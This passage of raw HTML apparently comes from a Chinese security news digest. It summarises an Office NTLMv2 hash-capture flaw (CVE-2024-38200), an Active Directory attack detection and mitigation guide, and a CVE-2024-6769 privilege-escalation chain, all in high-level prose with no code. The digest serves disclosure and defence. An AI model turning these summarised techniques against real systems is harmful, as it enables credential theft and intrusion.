	<img class="rich_pages wxw-img" data-ratio="0.4520123839009288" data-w="646" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=4f0856df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuMruddr6O0icNnWuBMTp9HX0TjrP1gonFHM5QpOBXNgLgjZAw5Kqck4g%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5055555555555555" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=57b08993&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuClZUheavFuqxibdTvq5kXGt4NepGbRPvqQrz1aFWncwY0VUZeeicgT2w%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软Office NTLMv2 漏洞 CVE-2024-38200 披露与 PoC</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软Office NTLMv2 漏洞 CVE-2024-38200 披露与 PoC</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuoWiaQqhwjQmBOqQiahPXCURxurjEWIQSFWsDJHw4KQcwj4ibQSGO0yqiaA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuoWiaQqhwjQmBOqQiahPXCURxurjEWIQSFWsDJHw4KQcwj4ibQSGO0yqiaA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525421224524422"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Office URI 方案可以被利用来捕获 NTLMv2 哈希值，这可能导致对域控制器的 NTLM Relaying 攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用 HTTP 302 重定向到 UNC 路径的方法，可以在用户无意中的情况下捕获哈希值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GPO 设置和 DNS 记录欺骗可以迫使 Office 应用程序进行自动认证，这使得哈希捕获更加容易。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">浏览器的信任区域设置对 NTLM 认证行为有重要影响，攻击者可以利用这一点来实现自动认证。</section></li></ul>
	<br/>
	<p>🏷️: CVE, Office, URI, NTLMv2, 哈希</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 检测和缓解Active Directory的妥协</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本网页主要介绍了如何检测和减轻针对微软Active Directory（AD）的攻击手段，包括Kerberoasting、AS-REP Roasting、密码喷雾、机器账户配额滥用、无约束委派、AD证书服务（AD CS）滥用、DCSync、ntds.dit转储、金票据、银票据以及金SAML等技术，并提供了相应的缓解策略和检测方法。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Active Directory安全指南：防御和检测攻击</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuPMQibP3efGcoAKr3JFLpho7qicjOicb2nNfDAk8h38T0CeWSOOk8xtmsg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuPMQibP3efGcoAKr3JFLpho7qicjOicb2nNfDAk8h38T0CeWSOOk8xtmsg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525421221812542"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Active Directory是攻击者的主要目标：由于其在企业IT网络中的核心作用，Active Directory经常成为攻击者的目标。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全配置和监控是关键：通过合理配置AD组件、使用强密码、限制权限和监控异常活动，可以显著降低攻击风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">多因素认证（MFA）的重要性：MFA可以有效阻止许多攻击技术，如密码喷雾和无约束委派。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">定期更改KRBTGT密码：为了防止Golden Ticket攻击，应定期更改KRBTGT账户的密码。</section></li></ul>
	<br/>
	<p>🏷️: Active Directory, 网络安全, 妥协检测, 缓解措施</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0a
			 CVE-2024-6769：利用激活缓存漏洞从中等权限提升至高权限</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页详细介绍了利用DLL劫持和激活上下文缓存中毒攻击两个链式漏洞，从中等完整性级别提升到高完整性级别，进而实现本地提权攻击的技术细节和步骤。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.9032258064516129" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="310" src="https://wechat2rss.xlab.app/img-proxy/?k=3c222051&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuNZ9DORx5mibiaTQnpJ5rDbiavq08bPEiczh8vI5A5LAS9JmlqODiaNia7aVA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.71875" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="992" src="https://wechat2rss.xlab.app/img-proxy/?k=da253cda&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu3tfbxrVAUmR7atIfZ6vuM0oEcCTsXYTt7jfUjmibFia9zOVVZKMcxvYg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.8623326959847036" data-w="523" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=f5d92120&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuNsHW31Et1NczyGjPdur06OSwbN695mo50IHkat6ibqXyiccqCOuKcuiaw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKut1aZHSIaOTbooNvPRzdBZ2knFTO1GB4yqBpqicFsHd3gF3gEQaPC11w/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKut1aZHSIaOTbooNvPRzdBZ2knFTO1GB4yqBpqicFsHd3gF3gEQaPC11w/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525421221814422"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
